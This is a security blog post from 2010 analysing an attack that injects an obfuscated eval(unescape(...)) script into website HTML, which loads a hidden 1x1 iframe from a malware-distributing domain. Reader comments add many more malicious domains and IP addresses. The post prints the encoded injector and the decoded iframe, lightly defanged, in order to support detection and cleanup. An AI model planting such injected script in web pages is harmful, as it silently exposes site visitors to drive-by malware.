Geezter, Qawfer and Other Malicious Iframes From 121 .156 .57 .184

   29 Sep 10   Filed in Short Attack Reviews, Website exploits

This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML

<s cript>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

This script can be detected by Unmask Parasites.

Once executed, this code injects the following hidden iframe

<i frame src="http://bocpoo.com/?705890" width=1 height=1></iframe>

On Google’s diagnostics pages of infected sites you’ll see words like:

Malicious software is hosted on 2 domain(s), including geezter .com/, bocpoo .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including bocpoo .com/.

This attack uses many different domain names (the script content changes accordingly): artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, minpoo.com, podfer .com, pukfer .com, redpoo .com, verfer.com, iseyh .com. All these domains names point to the IP address 121 .156 .57 .184 – server in South Korea (Korea Telecom). The domains are registered by Igor Nikenin from Rostov na Donu, Russia (this info can be fake)

Preliminary review of hacked sites make me think that this attack uses stolen FTP credentials. Although I don’t have strong evidence at this point, it’s always a good idea to scan computers that have access to hacked websites for malware and then change all site passwords. Refrain from saving passwords in FTP clients and try to use secure protocols (SFTP or FTPS) instead of FTP that transfers passwords in plain text.

If you know more information about this attack please share it in the comments section below.

Related posts:

• 10 FTP Clients Malware Steals Credentials From
• Evolution of Hidden Iframes
• Introduction to Website Parasites

If you need my help to resolve your site security issues, you can request it here.

Tags: iframe obfuscated script

Reader's Comments (13)

1. Tweets that mention Geezter, Qawfer and Other Malicious Iframes From 121 .156 .57 .184 | Unmask Parasites. Blog. -- Topsy.com | 30 Sep 2010 3:04 am

   [...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Geezter, Qawfer and Other Malicious Iframes From 12_156 _57_184 – Unmask Parasites blog – http://tinyurl.com/2egr75q [...]

2. Denis | 22 Nov 2010 4:40 pm

   More malicious domains:

   naurup .com
   saspoo .com

3. Alex Latham | 24 Nov 2010 9:53 pm

   Another Ip Address is 121 .156 .57 .185, besides 121 .156 .57 .184. All malicious domains are: artode.com, astnop.com, bawset.com, bedfer.com, bedret.com, bocpoo.com, cedfer.com, cerpoo.com, goapoo.com, kevfer.com, kiwdor.com, lowtip.com, minpoo.com, nunpoo.com, oportwe.com, podfer.com, pukfer.com. qawfer.com, qiamhot.com, redpoo.com, saspoo.com, sedfer.com, sedpoo.com, verfer.com, wasplac.com, wazxer.com, xedfer.com, xedpoo.com, aferup.com, ajirup.com, astped.com, blidhu.com, cutped.com, daiehu.com, dainhu.com, dsionhu.com, eainhu.com, edsinhu.com, exdshu.com, iainhu.com, jikped.com, jorped.com, laarup.com, mokaped.com, naerup.com, naurup.com, nsishu.com, oisrup.com, outped.com, padrup.com, quaped.com, qutped.com, sienhu.com, silrup.com, tivped.com, todped.com, and uaerup.com (IP Address 121.156.57.184), and biawwer.com, nuahnd.com, giaine.com, ksinne.com, ainerg.com, awotbop.com, geezter.com, baaswer.com, liaefr.com, wsinfr.com, aierfr.com, urinoor.com, naieerr.com, hianes.com, siinns.com, hinnws.com, niaekw.com, asonie.com, cdeinaa.com, chutnot.com, deetcor.com, gfinee.com, nasettg.com, neebver.com, nsieew.com, puntbar.com, sinesr.com, switbop.com, xeelpot.com, and zuubnot.com (IP Address 121.156.57.185). I saw that whole list on MalwareURL (malwareurl.com)

   • Alex Latham | 06 Apr 2011 1:57 am

     Another domain from 121.156.57.185 is pnaidc.com.

4. Alex Latham | 16 Dec 2010 4:58 pm

   Sorry, I meant xetpoo.com, not xedpoo.com.

5. Alex Latham | 17 Dec 2010 9:57 pm

   also from 121.156.57.185: aniess.com, butdt.com, dinwoo.com, einsien.com, gredet.com, horewdt.com, huffdt.com, and geerrge.com.

   • Alex Latham | 17 Dec 2010 9:58 pm

     Not only these, but also vinaie.com

     • Alex Latham | 06 Apr 2011 2:00 am

       Other domains are biarcm.com, guytin.com, kjdqein.com, msiane.com,and nupner.com.

6. Alex Latham | 25 Dec 2010 2:20 am

   before aferup.com on the top list (IP 121.156.57.184), I meant to list aedrup.com

7. Alex Latham | 21 Jan 2011 10:41 pm

   also iseyh.com, basyh.com, and cattww.com

   • Alex Latham | 06 Apr 2011 1:57 am

     I also add gbimd.com.

   • Alex Latham | 06 Apr 2011 9:42 pm

     Also aesyh.com, diayh.com, esiyh.com, eysyh.com, idnyh.com, oinyh.com, ppiyh.com, and woiyh.com

8. Alex Latham | 03 Feb 2011 12:06 am

   New attacks are from 10 .net domains, which are: aeined.net, eadied.net, haeied.net, huaned.net, kaieed.net, laiaed.net, pidied.net, roaaed.net, verred.net, and wodied.net.